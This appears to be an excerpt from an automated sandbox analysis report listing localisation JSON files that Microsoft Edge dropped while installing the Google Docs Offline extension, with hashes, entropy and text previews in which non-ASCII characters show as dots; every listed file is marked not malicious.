                                                                                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir6944_918814339\CRX_INSTALL\_locales\gl\messages.json

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):990
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.497202347098541
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
                                                                                                                                                                                                                                                                                                                                                              MD5:6BAAFEE2F718BEFBC7CD58A04CCC6C92
                                                                                                                                                                                                                                                                                                                                                              SHA1:CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
                                                                                                                                                                                                                                                                                                                                                              SHA-256:0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
                                                                                                                                                                                                                                                                                                                                                              SHA-512:3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir6944_918814339\CRX_INSTALL\_locales\gu\messages.json

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1658
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.294833932445159
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
                                                                                                                                                                                                                                                                                                                                                              MD5:BC7E1D09028B085B74CB4E04D8A90814
                                                                                                                                                                                                                                                                                                                                                              SHA1:E28B2919F000B41B41209E56B7BF3A4448456CFE
                                                                                                                                                                                                                                                                                                                                                              SHA-256:FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
                                                                                                                                                                                                                                                                                                                                                              SHA-512:040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir6944_918814339\CRX_INSTALL\_locales\hi\messages.json

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data